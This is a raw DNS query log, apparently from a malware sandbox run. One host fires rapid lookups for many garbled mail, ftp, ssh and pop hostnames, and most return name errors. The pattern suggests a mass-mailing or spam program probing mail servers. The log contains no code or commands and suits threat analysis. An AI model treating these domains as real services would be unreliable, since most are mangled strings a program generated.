Nov 30, 2023 11:22:40.017508984 CET	1.1.1.1	192.168.2.4	0x13a0	No error (0)	ww42.onlist.com	parkingcrew.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:22:40.017508984 CET	1.1.1.1	192.168.2.4	0x13a0	No error (0)	parkingcrew.net		185.53.179.29	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.056399107 CET	1.1.1.1	192.168.2.4	0x1e6d	Name error (3)	mail.syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.057173014 CET	1.1.1.1	192.168.2.4	0x8072	Name error (3)	ftp.ochcar.cin4g9tdamn.bagcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.059159040 CET	1.1.1.1	192.168.2.4	0xf3c3	Name error (3)	ftp.yah23051987hont.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.059779882 CET	1.1.1.1	192.168.2.4	0x96bd	Name error (3)	ftp.yahpn.yb	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.063749075 CET	1.1.1.1	192.168.2.4	0xe5b7	Name error (3)	ftp.sbcgloboo.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.064276934 CET	1.1.1.1	192.168.2.4	0x1fc8	Name error (3)	mail.ayls.xcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.075403929 CET	1.1.1.1	192.168.2.4	0x8f2d	Name error (3)	mail.lyco2.comom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.082710981 CET	1.1.1.1	192.168.2.4	0x168a	Name error (3)	ftp.comcaio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.083991051 CET	1.1.1.1	192.168.2.4	0x367e	Name error (3)	ssh.comcaio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.096798897 CET	1.1.1.1	192.168.2.4	0x779d	Name error (3)	mail.cucumbnr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.104362965 CET	1.1.1.1	192.168.2.4	0x9f8a	Name error (3)	mail.daytonpubhocso.cog	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.106419086 CET	1.1.1.1	192.168.2.4	0x351c	Name error (3)	mail.qhlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.109268904 CET	1.1.1.1	192.168.2.4	0x23b	Name error (3)	mail.kni.ol168.ecom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.111730099 CET	1.1.1.1	192.168.2.4	0xd09f	Name error (3)	ftp.wn26lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.113429070 CET	1.1.1.1	192.168.2.4	0x6da5	Name error (3)	ftp.oa.lagdfillemlmlml00xydurail.jkeziac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.115704060 CET	1.1.1.1	192.168.2.4	0x7945	Name error (3)	mail.jubo.cath	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.121906042 CET	1.1.1.1	192.168.2.4	0x7749	Name error (3)	ftp.deptka7ffmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.132771969 CET	1.1.1.1	192.168.2.4	0x1384	Name error (3)	ssh.gbivlporollm.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.141685963 CET	1.1.1.1	192.168.2.4	0xb47c	No error (0)	www.noweco.com	noweco.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:22:40.141685963 CET	1.1.1.1	192.168.2.4	0xb47c	No error (0)	noweco.com		216.37.42.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.165292025 CET	1.1.1.1	192.168.2.4	0x168a	Name error (3)	ftp.comcaio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.170202017 CET	1.1.1.1	192.168.2.4	0x3b1c	Name error (3)	ftp.aomttdl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.185579062 CET	1.1.1.1	192.168.2.4	0x6b7b	Name error (3)	imap.s.ddo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.185589075 CET	1.1.1.1	192.168.2.4	0x60a7	Name error (3)	ssh.a.o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.186029911 CET	1.1.1.1	192.168.2.4	0x2901	Name error (3)	hl.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.186074018 CET	1.1.1.1	192.168.2.4	0x10a0	Name error (3)	mail.7.dceilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.188113928 CET	1.1.1.1	192.168.2.4	0x1c65	Name error (3)	ftp.ee.idbo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.188687086 CET	1.1.1.1	192.168.2.4	0x3365	Name error (3)	ftp.ho10a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.189384937 CET	1.1.1.1	192.168.2.4	0xdaa0	Name error (3)	mail.feoio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.195164919 CET	1.1.1.1	192.168.2.4	0x41e9	Name error (3)	ftp.jubo.cath	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.197695971 CET	1.1.1.1	192.168.2.4	0xb0ad	No error (0)	ww42.2mail.com	parkingcrew.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:22:40.197695971 CET	1.1.1.1	192.168.2.4	0xb0ad	No error (0)	parkingcrew.net		185.53.179.29	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.202370882 CET	1.1.1.1	192.168.2.4	0x1049	Name error (3)	mail.qebyte.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.203340054 CET	1.1.1.1	192.168.2.4	0x6c6b	Name error (3)	ftp.slyvor.as290a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.203587055 CET	1.1.1.1	192.168.2.4	0x7c29	Name error (3)	mail.ezi.adompany.at	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.205701113 CET	1.1.1.1	192.168.2.4	0xb6b2	Name error (3)	ftp.e-fja8mso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.211035013 CET	1.1.1.1	192.168.2.4	0x5c7e	Name error (3)	kni.ol168.ecom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.212100029 CET	1.1.1.1	192.168.2.4	0xe401	Name error (3)	pop.tbsayail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.214107990 CET	1.1.1.1	192.168.2.4	0xd23f	Name error (3)	mail.ez786-lcolwicn.coofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.214955091 CET	1.1.1.1	192.168.2.4	0xc9d	Name error (3)	mail.wn26lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.247136116 CET	1.1.1.1	192.168.2.4	0xf8ef	Name error (3)	ssh.ser711a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.262825012 CET	1.1.1.1	192.168.2.4	0x3a3c	Name error (3)	ssh.gmdcblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.287626028 CET	1.1.1.1	192.168.2.4	0xe773	Name error (3)	ssh.asail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.337405920 CET	1.1.1.1	192.168.2.4	0xb0ad	No error (0)	ww42.2mail.com	parkingcrew.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:22:40.337405920 CET	1.1.1.1	192.168.2.4	0xb0ad	No error (0)	parkingcrew.net		185.53.179.29	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.337688923 CET	1.1.1.1	192.168.2.4	0xb47c	No error (0)	www.noweco.com	noweco.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:22:40.337688923 CET	1.1.1.1	192.168.2.4	0xb47c	No error (0)	noweco.com		216.37.42.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.337754011 CET	1.1.1.1	192.168.2.4	0x3a3c	Name error (3)	ssh.gmdcblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.339975119 CET	1.1.1.1	192.168.2.4	0xe98f	Name error (3)	ftp.horadguc1995l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.342677116 CET	1.1.1.1	192.168.2.4	0x2756	No error (0)	www.hugedomains.com		104.26.7.37	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.342677116 CET	1.1.1.1	192.168.2.4	0x2756	No error (0)	www.hugedomains.com		104.26.6.37	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.342677116 CET	1.1.1.1	192.168.2.4	0x2756	No error (0)	www.hugedomains.com		172.67.70.191	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.342786074 CET	1.1.1.1	192.168.2.4	0x9037	Name error (3)	mail.deptka7ffmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.343082905 CET	1.1.1.1	192.168.2.4	0xc40e	Name error (3)	mail.pyctl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.355726004 CET	1.1.1.1	192.168.2.4	0x3d4f	Name error (3)	ssh.gmaigcmar19l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.359122992 CET	1.1.1.1	192.168.2.4	0x9143	Name error (3)	mail.yahe.nen	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.360316992 CET	1.1.1.1	192.168.2.4	0xd278	Name error (3)	ftp.mn.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.362974882 CET	1.1.1.1	192.168.2.4	0x8fcd	Name error (3)	mail.gez542l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.365679026 CET	1.1.1.1	192.168.2.4	0xe1bc	Name error (3)	ftp.yahgr.neaco	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.366472006 CET	1.1.1.1	192.168.2.4	0x839a	Name error (3)	ftp.lyco2.comom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.372394085 CET	1.1.1.1	192.168.2.4	0xfd14	Name error (3)	comcaio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.373193026 CET	1.1.1.1	192.168.2.4	0x1aa5	Name error (3)	mail.tload.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.374870062 CET	1.1.1.1	192.168.2.4	0x8a36	Name error (3)	hot13l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.374991894 CET	1.1.1.1	192.168.2.4	0xb89f	Name error (3)	phcg87k6barre352odseba.dcivenail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.390506983 CET	1.1.1.1	192.168.2.4	0x8e35	No error (0)	www.hul.co.uk		68.183.34.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.390549898 CET	1.1.1.1	192.168.2.4	0x8e35	No error (0)	www.hul.co.uk		68.183.34.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.397375107 CET	1.1.1.1	192.168.2.4	0x77ba	Name error (3)	ftp.il.om	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.404397964 CET	1.1.1.1	192.168.2.4	0x2fd0	Name error (3)	ftp.yahe.nen	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.407469034 CET	1.1.1.1	192.168.2.4	0x2a0b	Name error (3)	mail.aomttdl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.412755966 CET	1.1.1.1	192.168.2.4	0x8fc9	Name error (3)	gtblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.417098999 CET	1.1.1.1	192.168.2.4	0x20d1	Name error (3)	ftp.yahgt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.417568922 CET	1.1.1.1	192.168.2.4	0x8c3b	Name error (3)	mail.hl.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.421425104 CET	1.1.1.1	192.168.2.4	0x2450	Name error (3)	pop.phcg87k6barre352odseba.dcivenail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.423063040 CET	1.1.1.1	192.168.2.4	0xc6c5	Name error (3)	ftp.hgaarnlundejl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.423079967 CET	1.1.1.1	192.168.2.4	0xfdf7	Name error (3)	mail.yahao.lsa	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.426054001 CET	1.1.1.1	192.168.2.4	0xbd7c	Name error (3)	ftp.feoio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.430223942 CET	1.1.1.1	192.168.2.4	0x9b39	Name error (3)	mail.e-fja8mso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.431436062 CET	1.1.1.1	192.168.2.4	0x113f	Name error (3)	ftp.yahjl.cxs	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.432957888 CET	1.1.1.1	192.168.2.4	0xa04d	Name error (3)	mail.hgaarnlundejl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.432975054 CET	1.1.1.1	192.168.2.4	0x8ca4	Name error (3)	ftp.gtblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.435355902 CET	1.1.1.1	192.168.2.4	0xc03f	Name error (3)	mail.ho10a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.436793089 CET	1.1.1.1	192.168.2.4	0xae3a	Name error (3)	ftp.as.r.upze	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.437347889 CET	1.1.1.1	192.168.2.4	0x2003	Name error (3)	mail.yahwoooie2ampu.comsh	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.437511921 CET	1.1.1.1	192.168.2.4	0xd81f	Name error (3)	mail.wr.omt222lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.437598944 CET	1.1.1.1	192.168.2.4	0x5a3b	Name error (3)	ssh.hl.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.438127995 CET	1.1.1.1	192.168.2.4	0xa176	Name error (3)	ftp.sgt9o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.439414024 CET	1.1.1.1	192.168.2.4	0x77ba	Name error (3)	ftp.il.om	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.440629005 CET	1.1.1.1	192.168.2.4	0x4bf8	Name error (3)	ftp.cucumbnr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.441200972 CET	1.1.1.1	192.168.2.4	0x5f40	Name error (3)	ftp.n.n.amdiu	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.443000078 CET	1.1.1.1	192.168.2.4	0xe19d	Name error (3)	ssh.ochcar.cin4g9tdamn.bagcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.443197012 CET	1.1.1.1	192.168.2.4	0xa5f4	Name error (3)	mail.domo5ho.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.443617105 CET	1.1.1.1	192.168.2.4	0x8e5a	Name error (3)	ssh.yahwoooie2ampu.comsh	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.444048882 CET	1.1.1.1	192.168.2.4	0xe94	Name error (3)	ssh.buromaril.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.444470882 CET	1.1.1.1	192.168.2.4	0x5ae4	Server failure (2)	ftp.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.444597960 CET	1.1.1.1	192.168.2.4	0x5ae4	Server failure (2)	ftp.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.447717905 CET	1.1.1.1	192.168.2.4	0xa5d7	Name error (3)	mail.ser711a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.447982073 CET	1.1.1.1	192.168.2.4	0x914b	Name error (3)	mail.buromaril.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.450768948 CET	1.1.1.1	192.168.2.4	0xfba5	Name error (3)	mailgate.yahnt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.452318907 CET	1.1.1.1	192.168.2.4	0xa405	Name error (3)	tbsayail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.452677011 CET	1.1.1.1	192.168.2.4	0x9820	Name error (3)	ftp.yahao.lsa	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.455581903 CET	1.1.1.1	192.168.2.4	0x5651	Name error (3)	mail.h2.spainvil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.474142075 CET	1.1.1.1	192.168.2.4	0x6507	Name error (3)	ftp.qebyte.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.476058006 CET	1.1.1.1	192.168.2.4	0x746d	Name error (3)	ftp.klp.tn	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.477812052 CET	1.1.1.1	192.168.2.4	0x9057	Name error (3)	mail.geu015naryo-uail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.488523006 CET	1.1.1.1	192.168.2.4	0x5989	Name error (3)	ftp.geu015naryo-uail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.489995003 CET	1.1.1.1	192.168.2.4	0x29dc	Name error (3)	ftp.yahpl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.490556002 CET	1.1.1.1	192.168.2.4	0xa80a	Name error (3)	ftp.ytcjmiil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.491620064 CET	1.1.1.1	192.168.2.4	0xc190	Name error (3)	mail.oa.lagdfillemlmlml00xydurail.jkeziac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.506414890 CET	1.1.1.1	192.168.2.4	0x66e5	Name error (3)	mail.acooil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.509097099 CET	1.1.1.1	192.168.2.4	0xc2c8	Name error (3)	mail.nnblmogblmoglil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.510211945 CET	1.1.1.1	192.168.2.4	0x68a9	Name error (3)	mail.asgmaanxgdil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.510569096 CET	1.1.1.1	192.168.2.4	0x8452	Name error (3)	ftp.h2.spainvil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.510792017 CET	1.1.1.1	192.168.2.4	0x39be	Name error (3)	ftp.fldie12.jdgwcollfaaba.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.512310028 CET	1.1.1.1	192.168.2.4	0x2d8c	Name error (3)	ftp.syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.529427052 CET	1.1.1.1	192.168.2.4	0x1ee0	Name error (3)	ssh.as.hauet	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.532103062 CET	1.1.1.1	192.168.2.4	0x1d66	Name error (3)	ssh.mn.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.535161018 CET	1.1.1.1	192.168.2.4	0x7576	Name error (3)	mail.slyvor.as290a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.536546946 CET	1.1.1.1	192.168.2.4	0xee8a	Name error (3)	t-yil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.536947966 CET	1.1.1.1	192.168.2.4	0x477e	Name error (3)	ftp.ezi.adompany.at	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.547560930 CET	1.1.1.1	192.168.2.4	0x82f5	Name error (3)	pop.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.548465014 CET	1.1.1.1	192.168.2.4	0x2659	Name error (3)	sgt9o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.549277067 CET	1.1.1.1	192.168.2.4	0xec51	Name error (3)	daytonpubhocso.cog	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.552191019 CET	1.1.1.1	192.168.2.4	0xcb9c	Server failure (2)	mail.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.553653002 CET	1.1.1.1	192.168.2.4	0xe465	Name error (3)	ftp.rambojoocta.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.559969902 CET	1.1.1.1	192.168.2.4	0xe4fd	Name error (3)	pop.comcaio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.560276031 CET	1.1.1.1	192.168.2.4	0xaa56	Name error (3)	mail.sgt9o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.560436010 CET	1.1.1.1	192.168.2.4	0xe19e	Name error (3)	mail.asail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.560453892 CET	1.1.1.1	192.168.2.4	0xd3e4	Name error (3)	ssh.acesineuiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.560997963 CET	1.1.1.1	192.168.2.4	0x5b5f	Name error (3)	mail.yahfll.ianus	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.561418056 CET	1.1.1.1	192.168.2.4	0xff84	Name error (3)	ssh.nnblmogblmoglil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.580662012 CET	1.1.1.1	192.168.2.4	0x9df5	Name error (3)	mail.gmaiuilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.581063986 CET	1.1.1.1	192.168.2.4	0x755f	Name error (3)	ftp.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.593035936 CET	1.1.1.1	192.168.2.4	0xdcba	Server failure (2)	mail.rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.593055010 CET	1.1.1.1	192.168.2.4	0xdcba	Server failure (2)	mail.rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.602050066 CET	1.1.1.1	192.168.2.4	0x4a5a	Name error (3)	ssh.sgt9o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.618630886 CET	1.1.1.1	192.168.2.4	0x2d8c	Name error (3)	ftp.syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.619780064 CET	1.1.1.1	192.168.2.4	0x66e5	Name error (3)	mail.acooil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.620510101 CET	1.1.1.1	192.168.2.4	0xc73a	Name error (3)	mail.ochcar.cin4g9tdamn.bagcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.621891022 CET	1.1.1.1	192.168.2.4	0x2daa	Name error (3)	mailgate.ochcar.cin4g9tdamn.bagcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.632704020 CET	1.1.1.1	192.168.2.4	0x3991	Name error (3)	ftp.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.660610914 CET	1.1.1.1	192.168.2.4	0xa09d	Name error (3)	mail.rambojoocta.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.674622059 CET	1.1.1.1	192.168.2.4	0xd05b	Name error (3)	ftp.he0114zusmg454lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.716237068 CET	1.1.1.1	192.168.2.4	0x17d6	Name error (3)	mail.klp.tn	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.741348028 CET	1.1.1.1	192.168.2.4	0x755f	Name error (3)	ftp.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.741852999 CET	1.1.1.1	192.168.2.4	0x3991	Name error (3)	ftp.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.742299080 CET	1.1.1.1	192.168.2.4	0xcb9c	Server failure (2)	mail.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.742400885 CET	1.1.1.1	192.168.2.4	0xe4fd	Name error (3)	pop.comcaio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.742432117 CET	1.1.1.1	192.168.2.4	0x2659	Name error (3)	sgt9o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.742585897 CET	1.1.1.1	192.168.2.4	0xe465	Name error (3)	ftp.rambojoocta.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.743124962 CET	1.1.1.1	192.168.2.4	0x9df5	Name error (3)	mail.gmaiuilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.743774891 CET	1.1.1.1	192.168.2.4	0x82f5	Name error (3)	pop.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.748985052 CET	1.1.1.1	192.168.2.4	0x47a6	Name error (3)	ssh.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.751395941 CET	1.1.1.1	192.168.2.4	0xedbf	Name error (3)	ssh.syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.756824017 CET	1.1.1.1	192.168.2.4	0x6a0b	Name error (3)	ssh.pyctl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.756921053 CET	1.1.1.1	192.168.2.4	0x9c6d	Name error (3)	pop.yah23051987hont.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.767353058 CET	1.1.1.1	192.168.2.4	0xcf10	Name error (3)	pop.caatholiomissa.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.771832943 CET	1.1.1.1	192.168.2.4	0x5859	Name error (3)	imap.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.772130013 CET	1.1.1.1	192.168.2.4	0x8a6b	Name error (3)	mail.acesineuiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.776806116 CET	1.1.1.1	192.168.2.4	0x2c75	Name error (3)	mail.il.om	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.778808117 CET	1.1.1.1	192.168.2.4	0xbdd0	Server failure (2)	ssh.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.778830051 CET	1.1.1.1	192.168.2.4	0xbdd0	Server failure (2)	ssh.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.847915888 CET	1.1.1.1	192.168.2.4	0xbba	Name error (3)	mail.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.847939014 CET	1.1.1.1	192.168.2.4	0xbba	Name error (3)	mail.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.850019932 CET	1.1.1.1	192.168.2.4	0x2cba	Name error (3)	mail.n.n.amdiu	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.852428913 CET	1.1.1.1	192.168.2.4	0x452b	Name error (3)	pop3.getococuail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.853081942 CET	1.1.1.1	192.168.2.4	0x307d	Name error (3)	ssh.t.ahlfth	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.853307962 CET	1.1.1.1	192.168.2.4	0xc481	Name error (3)	ssh.sbcglob4m.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.862232924 CET	1.1.1.1	192.168.2.4	0xedbf	Name error (3)	ssh.syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.864900112 CET	1.1.1.1	192.168.2.4	0x6f39	Name error (3)	mail.mn.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.866380930 CET	1.1.1.1	192.168.2.4	0xcc85	Name error (3)	ftp.a0i.com	none	none	A (IP address)	IN (0x0001)	false
